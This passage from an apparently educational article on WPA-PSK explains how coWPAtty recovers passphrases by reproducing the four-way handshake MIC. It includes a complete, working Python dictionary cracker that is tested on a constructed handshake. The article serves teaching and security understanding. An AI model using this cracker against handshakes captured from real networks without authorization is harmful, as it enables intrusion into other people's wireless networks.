The Achilles Heel
coWPAtty is a password cracker, and like every password-cracking tool it needs a target to test its guesses against. In the simplest case a cracker hashes a dictionary word and compares the result with a stolen password hash. Here the target is not a plain hash of the passphrase. It is buried several layers deep in the WPA key hierarchy, and reaching it takes significant work for every guess.
The Achilles heel of WPA is the calculated MIC value used to validate messages 2–4 of the four-way handshake (message 1 carries no MIC). In particular, coWPAtty targets the final EAPoL message, although any of the MIC-protected messages would work. Remember that this MIC is computed by passing the entire EAPoL-Key frame, with its own MIC field zeroed, through HMAC-MD5 keyed with the MIC Key (the KCK), which is the first 128 bits of the PTK. WPA2 with CCMP uses HMAC-SHA1 truncated to 128 bits in place of HMAC-MD5, but the attack is otherwise identical.
Because the MIC value (but not the key behind it) and the EAPoL message are both sent in the clear, an attacker can focus on reproducing that MIC. The cost is that every guess has to be walked through the whole key hierarchy. First the dictionary word is converted to a PMK with PBKDF2 (4,096 rounds of HMAC-SHA1), using the exact SSID as the salt, so an SSID that is off by one character makes every guess fail. The resulting PMK is then fed, together with the MAC addresses and nonces of the supplicant and authenticator, into the pairwise key expansion PRF, which yields the PTK. The attacker strips the MIC Key from the front of the PTK, computes the same HMAC over the captured EAPoL message, and checks whether the result equals the captured MIC. A match means the selected word is the passphrase.
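The chain described above (passphrase to PMK, PMK to PTK, KCK to MIC, compare with the captured MIC), written out as an added example. This is not coWPAtty's code or code from the original article; it is a stand-alone Python implementation of the same attack. The SSID, MAC addresses, nonces and the EAPoL message 2 frame are constructed in the block itself (the MIC is computed from the true passphrase so there is something to crack), and the function names are the author's own choices. The example goes slightly beyond the text by also handling WPA2's HMAC-SHA1-128 MIC, selected from the key descriptor version bits of the frame.

```python
import hashlib
import hmac
import struct

# Offset of the 16-byte MIC field inside an EAPoL-Key frame: 4-byte EAPoL header, then
# descriptor type (1), key info (2), key length (2), replay counter (8), nonce (32),
# key IV (16), key RSC (8), key ID (8) = 81 bytes before the MIC.
MIC_OFFSET = 81


def passphrase_to_pmk(passphrase: str, ssid: str) -> bytes:
    """Step 1: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits).
    The SSID is the salt, which is why a wrong SSID makes every guess fail."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, nbytes: int = 64) -> bytes:
    """Step 2: PTK = PRF(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    The min/max ordering is what lets both peers (and the attacker) derive the same PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def key_descriptor_version(eapol: bytes) -> int:
    """Low three bits of Key Information: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)."""
    return struct.unpack(">H", eapol[5:7])[0] & 0x7


def compute_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """Step 3: MIC over the whole EAPoL frame with its own MIC field zeroed, keyed by the KCK."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(wordlist, ssid, aa, spa, anonce, snonce, eapol):
    """Walk each candidate through PMK -> PTK -> KCK -> MIC and compare with the captured MIC."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    version = key_descriptor_version(eapol)
    for candidate in wordlist:
        pmk = passphrase_to_pmk(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]  # MIC Key = first 128 bits of the PTK
        if hmac.compare_digest(compute_mic(kck, eapol, version), captured_mic):
            return candidate
    return None


def build_message2(kck: bytes, snonce: bytes, version: int = 1) -> bytes:
    """Assemble a constructed EAPoL-Key message 2 (supplicant -> authenticator) and fill in its MIC."""
    key_info = 0x0108 | version  # pairwise (bit 3) + MIC present (bit 8) + descriptor version
    descriptor_type = 0xFE if version == 1 else 0x02  # WPA vs RSN key descriptor
    wpa_ie = bytes.fromhex("dd160050f20101000050f20201000050f20201000050f202")  # WPA IE, TKIP/PSK
    body = (bytes([descriptor_type]) + struct.pack(">HH", key_info, 32) + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
            + struct.pack(">H", len(wpa_ie)) + wpa_ie)
    frame = bytes([0x01, 0x03]) + struct.pack(">H", len(body)) + body  # EAPoL v1, type EAPOL-Key
    mic = compute_mic(kck, frame, version)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def constructed_capture(version: int = 1) -> dict:
    """A self-consistent, constructed handshake (not a real capture): SSID, MACs and nonces are
    made up, and the MIC is computed from the true passphrase so there is something to crack."""
    ssid, passphrase = "labwifi", "correct horse"
    aa = bytes.fromhex("000c41aabbcc")   # authenticator (AP) MAC, constructed
    spa = bytes.fromhex("0013cebbccdd")  # supplicant (client) MAC, constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_ptk(passphrase_to_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return dict(ssid=ssid, aa=aa, spa=spa, anonce=anonce, snonce=snonce,
                eapol=build_message2(kck, snonce, version))


if __name__ == "__main__":
    cap = constructed_capture()
    print("recovered passphrase:", crack(["password", "letmein", "correct horse"], **cap))
```

The per-guess cost is dominated by the 4,096 PBKDF2 rounds in `passphrase_to_pmk`; the PTK and MIC steps are cheap by comparison, which is why precomputed PMK tables only help when the SSID is one you have already tabulated.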
Sounds complex? That is why most of this article was spent on the background of WPA-PSK. Imagine trying to explain this process without first describing the PMK, the PTK, and their relationship to the MIC Key!
To help clarify how all this works, let's look at a step-by-step illustration revealing how a real four-way handshake can lead to a cracked password.